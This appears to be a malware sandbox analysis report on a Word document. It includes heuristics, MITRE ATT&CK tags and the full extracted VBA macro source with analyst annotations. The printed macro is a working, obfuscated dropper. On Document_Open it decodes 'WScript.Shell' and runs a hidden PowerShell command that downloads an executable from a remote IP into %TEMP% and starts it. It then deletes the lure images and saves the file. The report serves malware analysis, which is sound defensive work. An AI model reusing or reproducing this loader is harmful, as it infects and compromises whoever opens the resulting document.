MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sinks, indicative of a dropper. The ClamAV signature 'Doc.Dropper.Agent-5746617-0' further confirms its malicious nature. The VBA code's primary function appears to be executing a secondary payload, likely downloaded from an external source, which is a common tactic for malware droppers.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-5746617-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-5746617-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Obfuscated auto-exec VBA loader — critical — OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
serbesmvcczm = "lhqlvhjuennbxgji"
qdeerrvqebbusc (CreateObject(ysibbadrs("4WgdSQgcQ6r1is4pg7tb3.ggS7hdeoglb6l", "bsQ3d7oHu5164gK")))
End Sub
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
serbesmvcczm = "lhqlvhjuennbxgji"
qdeerrvqebbusc (CreateObject(ysibbadrs("4WgdSQgcQ6r1is4pg7tb3.ggS7hdeoglb6l", "bsQ3d7oHu5164gK")))
End Sub
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim mfbpruruql, materialtunnel
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8562 bytes |

SHA-256: b69ed29276d36c8efa4f1d4d22852e36163b817c7b4106af6498ae338b52120a
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header of the ThisDocument class module (as exported by olevba).
' The Document_Open Sub that follows is the auto-exec entry point of the sample.
' Auto-exec entry point: Word runs Document_Open when the document is opened.
' Every statement in this Sub except the "Module1.cymgusaohodnmh" call is
' padding: comparisons of two constants and assignments to locals that are
' never read afterwards.
Public Sub Document_Open()
Dim mfbpruruql, materialtunnel
mfbpruruql = 12
materialtunnel = 42
' 12 <> 42 is always True; the branch body only assigns unused locals.
If mfbpruruql <> materialtunnel Then
Dim dpnebihzpzz, bkgjpgkwddybfqs, izxjsbrnsubnthrmxd
dpnebihzpzz = "owqerudjmigrbmfj"
bkgjpgkwddybfqs = 61
izxjsbrnsubnthrmxd = "almostnurse"
End If
Dim lawnnoise, travelweird, pgvgirswmsktlsv
lawnnoise = "nastyseminar"
travelweird = 82
pgvgirswmsktlsv = "dfhirkbcavxkxqpa"
' The only live statement: control passes to Module1 (next stage).
Module1.cymgusaohodnmh
Dim hjpujqgjlze, engineuncover
hjpujqgjlze = 18
engineuncover = 55
' Arithmetic on locals whose result is never used.
If hjpujqgjlze <> engineuncover Then
hjpujqgjlze = hjpujqgjlze + engineuncover + 40
End If
Dim kpedtfrows, jllaxdepltjikpknglm
kpedtfrows = 54
jllaxdepltjikpknglm = 16
If kpedtfrows <> jllaxdepltjikpknglm Then
Dim vuumzzxamxotrkugpke, cheeseforward, rotnzwpyykqdybb
vuumzzxamxotrkugpke = "justtoe"
cheeseforward = 2
rotnzwpyykqdybb = "auetseozjejshi"
End If
End Sub
Attribute VB_Name = "Module1"
' Module header of the standard module that holds the decoder and the
' CreateObject / Run execution chain.
' Pass-through stage called from Document_Open. The only live statement is the
' call to xqupuukmcgjcmowtks; everything else is padding (unused locals, an
' empty If block, and arithmetic whose result is discarded).
Public Sub cymgusaohodnmh()
Dim zcrzxpfybagietkf, kitrisk, stadiumtimber
zcrzxpfybagietkf = "boystrong"
kitrisk = 13
stadiumtimber = "alreadyforum"
Dim wqqpudrsjodllpgkn, uwpjneikdfymjbtqdff
wqqpudrsjodllpgkn = 87
uwpjneikdfymjbtqdff = 11
' Empty branch: no effect.
If wqqpudrsjodllpgkn <> uwpjneikdfymjbtqdff Then
End If
' Next stage: builds the COM object and triggers execution.
xqupuukmcgjcmowtks
Dim inputstyle, svslrgdkoq, hwogdmmhlbqupqs
inputstyle = "dfhvgvfkorseodxuffc"
svslrgdkoq = 86
hwogdmmhlbqupqs = "wcvizkeutbblx"
Dim holidayimpulse, cwdirwntsjljhucnkxw
holidayimpulse = 50
cwdirwntsjljhucnkxw = 35
If holidayimpulse <> cwdirwntsjljhucnkxw Then
holidayimpulse = holidayimpulse + cwdirwntsjljhucnkxw + 40
End If
End Sub
' Builds the command line that qdeerrvqebbusc hands to WScript.Shell.Run.
' Result = <decoded first literal> & alphastove & rtpijwjidjrcri().
' Applying ysibbadrs by hand to the two literals below (verify offline):
'   - the second call decodes to a PowerShell invocation using a hidden window,
'     no profile and an execution-policy bypass;
'   - alphastove decodes to a System.Net.WebClient DownloadFile fragment whose
'     URL begins hxxp://185[.]117[.]73[.]147/ (defanged);
'   - rtpijwjidjrcri supplies the rest of the URL, the drop path and the
'     Start-Process call.
' Net effect: a download-and-execute one-liner, i.e. classic dropper behaviour.
Public Function onnonkjjxqnsve()
Dim countryverify, minimumscout, raterotate
countryverify = "fewpull"
minimumscout = 31
raterotate = "cattletrend"
' alphastove is never declared (implicit Variant); holds the download fragment.
alphastove = ysibbadrs("Qq(GNJPefVwfQ-UgOHbGjQeVcUPtf KSGGygUsgtfeVqmU.qNfegQtPV.UWJegQbQJCPlHUiUGeUnVItVK)Uf.9qD9IoHgwfnGKlqogaKdIFUfiglfegU(G'qghItUftVpJ:Q/fJ/gV1q8I5II.q1I1K7fg.fU79U3H.PG1Vg4UV7Q/Qu", "HVIJGqgPg9UfUQK")
' Concatenation order: PowerShell prefix, download fragment, tail from rtpijwjidjrcri.
onnonkjjxqnsve = ysibbadrs("EApXEouwHeXurcsHDhXetXlXlX AD-XAwA AhMXiXcdAdXceXnE c-PnXoDpI X-EeEpA tIbXycXpEEatIsIDsP ", "PAHMEXutEcXXXID") & alphastove & rtpijwjidjrcri
' Padding below: locals assigned but never read.
Dim aduxuzwqgovvpfpmzck, aonbpgkwanl, dzlfsneeou
aduxuzwqgovvpfpmzck = "abandoninjury"
aonbpgkwanl = 67
dzlfsneeou = "arcticlab"
Dim boatdistance, jpffbksve
boatdistance = 27
jpffbksve = 44
If boatdistance <> jpffbksve Then
Dim barelycouch, tnjerntthctkxrleczy, generalteach
barelycouch = "allowvisual"
tnjerntthctkxrleczy = 61
generalteach = "pexldkdjmutlis"
End If
End Function
' Second half of the command line assembled in onnonkjjxqnsve.
' Decoded by hand with ysibbadrs (verify offline): it completes the download
' URL path (/update.exe), names a %TEMP%\puttyx86.exe drop location and ends
' with a Start-Process call on that dropped file. Splitting the command across
' two functions keeps the full string out of any single literal.
Public Function rtpijwjidjrcri()
rtpijwjidjrcri = ysibbadrs("l5pAdLlaJtALeG.Ze5x5keh'nF,k'Z5%hT3EGMLJPk%k5\GJplulZtFAtLy5xJk83A6L.GeAnxFeFA'AL)Z;k AASAntAkaLZrl5tJ-ZlPhnrFLoAc3FehZsLks5J(JG'Z%JTAE3MLPA%F\5ApJnu55tAtGyGxGJ8nh6A.AenAxA5eGA'Zn)", "J5kAFZh3A5LGLnl")
' Padding: locals assigned after the return value is set, never read.
Dim narrowused, bfntwcbxyzpc, bonemotor
narrowused = "mumrxnsuk"
bfntwcbxyzpc = 74
bonemotor = "limitopera"
End Function
' String decoder used at every sensitive call site in this module.
' Returns cubedizzy with every character that also occurs in seonnonkjjxqnsve
' removed. The second argument is therefore a per-call "junk alphabet", not a
' cipher key: to recover any call-site string for IoC extraction, drop from the
' first literal each character that appears in the second literal.
' NOTE(review): membership is tested via InStr (see wolxeukmsmqag); whether the
' comparison is case-sensitive depends on the module's Option Compare setting,
' which is not visible in this listing — assumed binary (case-sensitive).
Public Function ysibbadrs(cubedizzy, seonnonkjjxqnsve)
' Accumulator for the kept characters (implicitly declared Variant).
cnchgpcooch = ""
For inspireplug = 1 To Len(cubedizzy)
' Padding: unused locals and an empty If block inside the loop.
Dim caveglide, uncoverupset, vsaeoexrvn
caveglide = "inquirysimilar"
uncoverupset = 81
vsaeoexrvn = "raccoonrack"
Dim repairunknown, pakooyschukij
repairunknown = 56
pakooyschukij = 49
If repairunknown <> pakooyschukij Then
End If
' Current input character.
hfmqzeapfefssivs = Mid(cubedizzy, inspireplug, 1)
Dim xvxfnemmsrirwzucm, arjtzbnls
xvxfnemmsrirwzucm = 82
arjtzbnls = 58
If xvxfnemmsrirwzucm <> arjtzbnls Then
Dim sbuualgzet, jzehygqarliblfbvfzm, otjskmteuguxysid
sbuualgzet = "lmfneltkowwbhi"
jzehygqarliblfbvfzm = 20
otjskmteuguxysid = "depthsuffer"
End If
Dim whxvvmmrruxkczb As Boolean
Dim ydgtokifhk, busypizza
ydgtokifhk = 16
busypizza = 6
If ydgtokifhk <> busypizza Then
Dim zhgkdsgtdb, fudtckkpjdtdhtcjuw, fileobey
zhgkdsgtdb = "cementjump"
fudtckkpjdtdhtcjuw = 56
fileobey = "addpony"
End If
Dim xwetwvwxgwfnoqj, zsbiwdgyz, antennalogic
xwetwvwxgwfnoqj = "matchverify"
zsbiwdgyz = 71
antennalogic = "inquirynetwork"
' True when the character occurs in the junk alphabet (non-zero InStr position
' coerced to Boolean).
whxvvmmrruxkczb = wolxeukmsmqag(seonnonkjjxqnsve, hfmqzeapfefssivs)
' Keep only characters that are NOT in the junk alphabet.
If Not whxvvmmrruxkczb Then
cnchgpcooch = cnchgpcooch & hfmqzeapfefssivs
Dim bygjdlqwteawt, kajjleuixred
bygjdlqwteawt = 87
kajjleuixred = 53
If bygjdlqwteawt <> kajjleuixred Then
End If
Dim escapehelp, buffaloclaw, penciluniform
escapehelp = "hgwmorjvl"
buffaloclaw = 53
penciluniform = "msdxyarvoirkzzauhfx"
End If
Next
' Return the filtered string.
ysibbadrs = cnchgpcooch
' Padding after the return value is set.
Dim hqfttigrkta, embarksolution
hqfttigrkta = 53
embarksolution = 62
If hqfttigrkta <> embarksolution Then
hqfttigrkta = hqfttigrkta + embarksolution + 58
End If
Dim hpbsexckwpuyrax, ivivqdlvyyyjzharszz, mixedpilot
hpbsexckwpuyrax = "jellylottery"
ivivqdlvyyyjzharszz = 31
mixedpilot = "cruisejust"
End Function
' Membership test used by the decoder. Returns
' InStr(oeupdvvoblejfkhnk, ivlugslxteaihvv): the 1-based position of the second
' string inside the first, or 0 when it is absent. The caller stores the result
' in a Boolean, so any non-zero position reads as True ("character is junk").
' Every other statement here is padding: unused locals and arrays, empty If
' blocks and a multiplication by 0#.
Public Function wolxeukmsmqag(oeupdvvoblejfkhnk, ivlugslxteaihvv)
Dim ozmlznvikxga, gesturepurse, kzlfkcojnzpnhg
ozmlznvikxga = "cmclglismkngxi"
gesturepurse = 7
kzlfkcojnzpnhg = "ujljhrjnctlsfed"
Dim asktitle, cigarpolar
asktitle = 83
cigarpolar = 19
If asktitle <> cigarpolar Then
End If
' Arrays declared but never used.
Dim flqakwkzwxa(10) As Integer
Dim lusdwieqqlmmhd, marketmystery, wjmguopkq
lusdwieqqlmmhd = "hwzfquqhz"
marketmystery = 84
wjmguopkq = "clxxifsxcqqbbx"
Dim ebnzhzcknws(5, 5) As Double
Dim txndebiklbg, ztohjlqllsz, ucyfpbjfjbcusprjo
txndebiklbg = "hgldzqxxrzuzeekarm"
ztohjlqllsz = 26
ucyfpbjfjbcusprjo = "documentnephew"
' The only live statement: the return value is set here.
wolxeukmsmqag = InStr(oeupdvvoblejfkhnk, ivlugslxteaihvv)
qddwcfkkzcpda = 2
Dim nuawtjdmfh, mtquqfejdqzeitjaypu
nuawtjdmfh = 8
mtquqfejdqzeitjaypu = 81
If nuawtjdmfh <> mtquqfejdqzeitjaypu Then
Dim editexpire, eviltoken, nubbeuhzhukpmonex
editexpire = "vzbxpaxyciixsfc"
eviltoken = 58
nubbeuhzhukpmonex = "appearsponsor"
End If
' Same name as the loop counter in ysibbadrs, but with no module-level
' declaration in this listing it is a separate procedure-local variable and does
' not disturb that loop (assumes no Option Explicit / module-level Dim elsewhere).
inspireplug = 1
Dim corelayer, jpodsvzibc, sejdpupnaxaljfdqhsr
corelayer = "aroundrose"
jpodsvzibc = 74
sejdpupnaxaljfdqhsr = "qwqkaxuvnaadopmhjc"
Dim combinedizzy, xodqdayvpbnazfyd
combinedizzy = 71
xodqdayvpbnazfyd = 45
If combinedizzy <> xodqdayvpbnazfyd Then
Dim sjailvsfdyuzqx, vouupzxrbgfb, mistakeslogan
sjailvsfdyuzqx = "ceilingtopic"
vouupzxrbgfb = 14
mistakeslogan = "intactnapkin"
End If
Dim animalenergy As Double
Dim shipstadium, execute, icgkfetiyo
shipstadium = "wusmmrusdpgihnvb"
execute = 96
icgkfetiyo = "xpdsycuhlimleaavmf"
' Always 0#; dead computation.
animalenergy = 0# * qddwcfkkzcpda
Dim dumbhorror, hjjipqoqt, ybreudyselk
dumbhorror = "echotrain"
hjjipqoqt = 89
ybreudyselk = "clubcreek"
End Function
' Creates the COM execution object and hands it to qdeerrvqebbusc.
' The ProgID is hidden behind the decoder: applying ysibbadrs by hand to the two
' literals on the CreateObject line yields "WScript.Shell" (verify offline).
' Keeping the ProgID out of the source is what defeats naive string scanning.
' All other statements are padding.
Public Sub xqupuukmcgjcmowtks()
Dim menuorgan, lockturtle, nzmwcgbphcmdhuawoo
menuorgan = "cdismqwqu"
lockturtle = 29
nzmwcgbphcmdhuawoo = "poaufgjvnmnj"
Dim hpdqwcddrtzuagvekw, uxsgkozyxedbsjmdir, serbesmvcczm
hpdqwcddrtzuagvekw = "cropdevelop"
uxsgkozyxedbsjmdir = 33
serbesmvcczm = "lhqlvhjuennbxgji"
' COM instantiation sink: the object becomes the parameter of qdeerrvqebbusc.
qdeerrvqebbusc (CreateObject(ysibbadrs("4WgdSQgcQ6r1is4pg7tb3.ggS7hdeoglb6l", "bsQ3d7oHu5164gK")))
End Sub
' Execution sink. The parameter name shadows the Sub xqupuukmcgjcmowtks; inside
' this procedure it is the object the caller created from the decoded
' "WScript.Shell" ProgID. After execution the Sub scrubs the open document.
Public Sub qdeerrvqebbusc(xqupuukmcgjcmowtks)
' WScript.Shell.Run(command, windowStyle): onnonkjjxqnsve() is the assembled
' command line, 0 = hidden window. The wait argument is omitted, so the macro
' returns without blocking on the child process.
xqupuukmcgjcmowtks.Run onnonkjjxqnsve, 0
Dim vsboeqfqbrcevvfr, ibflknfmy
vsboeqfqbrcevvfr = 11
ibflknfmy = 66
If vsboeqfqbrcevvfr <> ibflknfmy Then
End If
Dim vtccaoywyvjqlp, kidshallow, hdodfovnutmtal
vtccaoywyvjqlp = "wxzqvhfdovpznm"
kidshallow = 92
hdodfovnutmtal = "spiceuncle"
Dim oftenprosper, jnxhlffftqdukarovwe, xfdywlkykksgeou
oftenprosper = "nothingreturn"
jnxhlffftqdukarovwe = 18
xfdywlkykksgeou = "monsterrun"
' Deletes every inline shape from the open document — presumably removes the
' lure image so the document looks clean afterwards (inferred; the shapes
' themselves are not in this listing).
With ActiveDocument.InlineShapes
Dim iifogzucmizegxghmd, cagepull, callregular
iifogzucmizegxghmd = "doubleholiday"
cagepull = 15
callregular = "lxmmddybhlo"
Dim ykxhtefmwyrmxpetpjl, chatshuffle
ykxhtefmwyrmxpetpjl = 87
chatshuffle = 3
If ykxhtefmwyrmxpetpjl <> chatshuffle Then
End If
' Loop until the collection is empty; always removes the first item.
Do While .Count > 0
.Item(1).Delete
Dim qvhwbjydgcchagj, ldgsigbqqqsmlipxe, minyecdtgw
qvhwbjydgcchagj = "ckuicidxnkrsnzte"
ldgsigbqqqsmlipxe = 80
minyecdtgw = "cfkvieslqqlf"
Loop
Dim qvjuyeevpbhdojkms, budgetwarrior, meadowspread
qvjuyeevpbhdojkms = "ykiopgbcgxliyul"
budgetwarrior = 2
meadowspread = "bzgwmkfebkmmgvgcgn"
End With
' Persists the scrubbed document to disk; forensic note: the on-disk copy will
' no longer match the sample as delivered.
ActiveDocument.Save
Dim bvcdvogbeogkrtbyrm, yxnizmqetphcmpiaoh
bvcdvogbeogkrtbyrm = 4
yxnizmqetphcmpiaoh = 30
If bvcdvogbeogkrtbyrm <> yxnizmqetphcmpiaoh Then
Dim empowerphone, cliniconline, guntaste
empowerphone = "aklbzueyc"
cliniconline = 39
guntaste = "wuwvnygoqyucacm"
End If
End Sub
|
|||